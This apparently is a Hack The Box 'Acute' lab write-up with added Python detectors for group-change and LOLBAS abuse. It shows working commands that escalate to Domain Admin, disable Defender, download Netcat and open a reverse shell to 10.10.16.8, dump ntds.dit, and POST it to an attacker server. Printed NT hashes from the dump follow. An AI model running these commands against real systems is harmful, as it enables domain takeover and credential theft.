keepmeon
As previously mentioned, there is a batch script that executes any other batch scripts located in the same directory, C:\Program Files\keepmeon. This script is reportedly configured as a scheduled task that runs every 5 minutes under the security context of the lhopkins user.
I will first add the current user, awallace, to the Site_Admin group by creating a batch script in that directory.
Site_Admin
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path "C:\Program Files\keepmeon\site_admin.bat" -Value "NET GROUP /DOMAIN Site_Admin /ADD awallace"}
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls "C:\Program Files\keepmeon"}
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER
-a---- 07/11/2023 14:16 44 site_admin.bat ATSSERVER
The batch file is created at C:\Program Files\keepmeon\site_admin.bat.
Once the scheduled task runs keepmeon.bat, this newly created script will add the awallace user to the Site_Admin group.
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {net group Site_Admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.
A moment later, I can confirm that the awallace user has been added to the Site_Admin group.
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.
I also discovered that, once a member of the Site_Admin group, the awallace user is no longer bound by the restrictions of the dc_manage session configuration.
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {NET GROUPS /DOMAIN "Domain Admins" /ADD edavies}
The command completed successfully.
It turns out that membership in the Site_Admin group provides direct write access to the Domain Admins group, since I am able to add anyone to the DA group. However, this change seems to get reverted, as users added to the group are eventually flushed out, so I would need to be quick.
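From the defender's side, the group additions in this section (Site_Admin, then Domain Admins, including the self-addition that follows) and the periodic flush described above are visible in the Security log as events 4728 and 4729. The detector below is an added example, not part of the original write-up; the event records are constructed to mirror the EventData fields of those two events.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry) shaped like Windows Security
# events 4728 (member added to a security-enabled global group) and 4729
# (member removed). Field names follow the events' EventData.
SAMPLE_EVENTS = [
    {"time": "2023-11-07T14:20:03", "id": 4728, "SubjectUserName": "lhopkins",
     "MemberName": "CN=awallace,CN=Users,DC=acute,DC=local", "TargetUserName": "Site_Admin"},
    {"time": "2023-11-07T14:21:10", "id": 4728, "SubjectUserName": "awallace",
     "MemberName": "CN=edavies,CN=Users,DC=acute,DC=local", "TargetUserName": "Domain Admins"},
    {"time": "2023-11-07T14:22:45", "id": 4728, "SubjectUserName": "awallace",
     "MemberName": "CN=awallace,CN=Users,DC=acute,DC=local", "TargetUserName": "Domain Admins"},
    {"time": "2023-11-07T14:25:01", "id": 4729, "SubjectUserName": "Administrator",
     "MemberName": "CN=edavies,CN=Users,DC=acute,DC=local", "TargetUserName": "Domain Admins"},
    {"time": "2023-11-07T15:00:00", "id": 4728, "SubjectUserName": "Administrator",
     "MemberName": "CN=svc_backup,CN=Users,DC=acute,DC=local", "TargetUserName": "Backup Operators"},
]

# Groups treated as tier 0. Site_Admin is included because its own comment
# says it grants access to Domain Admins, which makes it tier 0 in practice.
SENSITIVE_GROUPS = {"domain admins", "enterprise admins", "administrators", "site_admin"}

def member_cn(dn):
    """Return the CN (account name) from a distinguished name."""
    return dn.split(",")[0].split("=", 1)[1]

def detect_sensitive_group_changes(events, revert_window=timedelta(minutes=10)):
    """One alert per addition to a sensitive group. The alert is marked
    self_add when the actor added their own account, and transient when a
    4729 removal of the same member follows within revert_window, which is
    the signature of a short-lived grab that a cleanup job later undoes."""
    alerts, pending = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["TargetUserName"].lower() not in SENSITIVE_GROUPS:
            continue
        when = datetime.fromisoformat(ev["time"])
        key = (ev["TargetUserName"].lower(), member_cn(ev["MemberName"]).lower())
        if ev["id"] == 4728:
            alert = {"time": ev["time"], "group": ev["TargetUserName"], "member": key[1],
                     "actor": ev["SubjectUserName"],
                     "self_add": ev["SubjectUserName"].lower() == key[1],
                     "transient": False, "removed_by": None}
            alerts.append(alert)
            pending[key] = (when, alert)
        elif ev["id"] == 4729 and key in pending:
            added_at, alert = pending.pop(key)
            if when - added_at <= revert_window:
                alert["transient"], alert["removed_by"] = True, ev["SubjectUserName"]
    return alerts

if __name__ == "__main__":
    for a in detect_sensitive_group_changes(SAMPLE_EVENTS):
        print(a)
```

A cleanup job that silently flushes Domain Admins hides the abuse from a point-in-time membership review; correlating the add with its removal is what makes the transient grant show up.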
Domain Admin
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {NET GROUP /DOMAIN "Domain Admins" /ADD awallace ; Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; Set-MpPreference -DisableScriptScanning 1 ; iwr -Uri http://10.10.16.8/nc64.exe -Outfile C:\Users\awallace\Documents\nc64.exe ; C:\Users\awallace\Documents\nc64.exe 10.10.16.8 1234 -e powershell}
The above command additionally adds the awallace user to the Domain Admins group, disables Defender's real-time monitoring, IOAV protection and script scanning, downloads Netcat from the attacking host and executes a reverse shell back to Kali.
┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49550
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\awallace\Documents> whoami
whoami
acute\awallace
PS C:\Users\awallace\Documents> hostname
hostname
ATSSERVER
PS C:\Users\awallace\Documents> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (vswitch1):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::30d2:fb97:8091:2846%9
IPv4 Address. . . . . . . . . . . : 172.16.22.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::249
IPv6 Address. . . . . . . . . . . : dead:beef::78a4:cbc4:b505:36bb
Link-local IPv6 Address . . . . . : fe80::78a4:cbc4:b505:36bb%8
IPv4 Address. . . . . . . . . . . : 10.10.11.145
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%8
10.10.10.2
PS C:\Users\awallace\Documents> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
acute\awallace S-1-5-21-1786406921-1914792807-2072761762-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ACUTE\Domain Admins Group S-1-5-21-1786406921-1914792807-2072761762-512 Mandatory group, Enabled by default, Enabled group
ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
ACUTE\Site_Admin Group S-1-5-21-1786406921-1914792807-2072761762-2102 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
ACUTE\Denied RODC Password Replication Group Alias S-1-5-21-1786406921-1914792807-2072761762-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
The awallace user is now a domain admin.
Hashdump
PS C:\Users\awallace\Documents> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp
Creating snapshot...
Snapshot set {9625219d-75c0-46cd-a7de-20b5ce1b2d16} generated successfully.
Snapshot {7e0d795f-9124-4a3c-b370-e29ea483c6f4} mounted as C:\$SNAP_202311071518_VOLUMEC$\
Snapshot {7e0d795f-9124-4a3c-b370-e29ea483c6f4} is already mounted.
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_202311071518_VOLUMEC$\Windows\NTDS\ntds.dit
Target Database: c:\temp\Active Directory\ntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying c:\temp\registry\SYSTEM
Copying c:\temp\registry\SECURITY
Snapshot {7e0d795f-9124-4a3c-b370-e29ea483c6f4} unmounted.
IFM media created successfully in c:\temp
ifm: q
C:\Windows\system32\ntdsutil.exe: q
Dumping the domain secrets with the LOLBAS ntdsutil.exe, which snapshots the volume and copies ntds.dit together with the SYSTEM and SECURITY registry hives into C:\temp.
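Both LOLBAS steps in this walkthrough, the Defender tampering in the Domain Admin command and the ntdsutil IFM export above, leave a distinctive process command line. The rule set below is an added example for detection, not part of the original write-up; the records are constructed in the shape of process-creation telemetry (Security event 4688 / Sysmon event 1), with the first two command lines taken from the write-up and the last two as benign look-alikes that must not alert.

```python
import re

# Constructed sample records (not real telemetry) shaped like process-creation
# telemetry: who ran which image, with the full command line.
SAMPLE_PROCESSES = [
    {"User": "ACUTE\\awallace", "Image": "C:\\Windows\\System32\\ntdsutil.exe",
     "CommandLine": "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q"},
    {"User": "ACUTE\\awallace", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Set-MpPreference -DisableRealtimeMonitoring $true ; "
                    "Set-MpPreference -DisableIOAVProtection $true ; Set-MpPreference -DisableScriptScanning 1"},
    {"User": "ACUTE\\Administrator", "Image": "C:\\Windows\\System32\\ntdsutil.exe",
     "CommandLine": "ntdsutil.exe \"activate instance ntds\" files info q q"},
    {"User": "ACUTE\\Administrator", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Set-MpPreference -DisableRealtimeMonitoring $false"},
]

# ntdsutil accepts abbreviated commands ("ac i ntds" is "activate instance ntds"),
# so the rule keys on the IFM media creation itself, which is what copies
# ntds.dit plus the SYSTEM/SECURITY hives out of the snapshot.
IFM_CREATE = re.compile(r"\bifm\b.*\bcreate\s+(?:sysvol\s+)?full\b", re.I | re.S)
# Set-MpPreference -Disable<Feature> followed by $true, true or 1 (the write-up
# uses both the $true and the bare 1 form). $false must not match.
MP_DISABLE = re.compile(r"-(disable[a-z]+)\s+(\$true|true|1)\b", re.I)

def check_process(rec):
    """Return a list of (rule, detail) hits for one process-creation record."""
    image, cl = rec["Image"].lower(), rec["CommandLine"]
    hits = []
    if image.endswith("\\ntdsutil.exe") and IFM_CREATE.search(cl):
        hits.append(("ntds_ifm_dump", "IFM media creation exports ntds.dit and registry hives"))
    if "set-mppreference" in cl.lower():
        disabled = sorted({m.group(1) for m in MP_DISABLE.finditer(cl)})
        if disabled:
            hits.append(("defender_tamper", "disabled: " + ", ".join(disabled)))
    return hits

def scan(records):
    """Run every record through check_process and return a flat list of alerts."""
    return [{"user": r["User"], "rule": rule, "detail": detail}
            for r in records for rule, detail in check_process(r)]

if __name__ == "__main__":
    for alert in scan(SAMPLE_PROCESSES):
        print(alert)
```

Event 4688 only carries the command line when "Include command line in process creation events" is enabled by policy, so confirm that setting (or Sysmon) is in place before relying on these rules.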
PS C:\Users\awallace\Documents> Compress-Archive -Path C:\temp\* -DestinationPath .\secret.zip
PS C:\Users\awallace\Documents> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Users\awallace\Documents\secret.zip'
Archiving the secrets into the secret.zip file and sending it to the attacking host in an HTTP POST request.
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ cat post.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class MyRequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read exactly the body length the client declared, then write it to disk
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        with open('secret.zip', 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()  # flush the status line and headers so the client gets a reply

httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ python3 post.py
10.10.11.145 - - [07/Nov/2023 23:06:56] "POST / HTTP/1.1" 200 -
A local Python web server receives and saves the archive.
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ unzip secret.zip
Archive: secret.zip
warning: secret.zip appears to use backslashes as path separators
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
inflating: registry/SECURITY
inflating: registry/SYSTEM
Extracting the archive; the warning about backslashes is expected, since the paths were written on Windows.
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ impacket-secretsdump local -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x76b30d09b168e2fef3eafd2807ef4d38
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f4a0354252e672f70e598382ffac04ea
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f0d7ab061a6e3f1bfea035b82b949f71bea0c19
dpapi_userkey:0x99f7c96ea5e383cc1f4baf033c7f6ca49cd601d9
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 0077467258de8907401360af09cc7347
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ATSSERVER$:1000:aad3b435b51404eeaad3b435b51404ee:f4a0354252e672f70e598382ffac04ea:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d54887a4cc5d73de54d051600c4b13b:::
MARVEL-PC01$:1103:aad3b435b51404eeaad3b435b51404ee:3298a4f2794fdb6686160c34d059d186:::
acute.local\awallace:1104:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
acute.local\chall:1105:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
acute.local\edavies:1106:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
acute.local\imonks:1107:aad3b435b51404eeaad3b435b51404ee:38da83dd3b7bdb2878360a21b9480c1f:::
acute.local\jmorgan:1108:aad3b435b51404eeaad3b435b51404ee:b0956dfd75fc21fc6e852a3ce59a4365:::
acute.local\lhopkins:1109:aad3b435b51404eeaad3b435b51404ee:0237ca8f3465a7ee79f4ab44cc5e2ce6:::
ACUTE-PC01$:1110:aad3b435b51404eeaad3b435b51404ee:816f14efc1aef18b93f811509ea9a98e:::
[*] Cleaning up...
Domain Level Compromise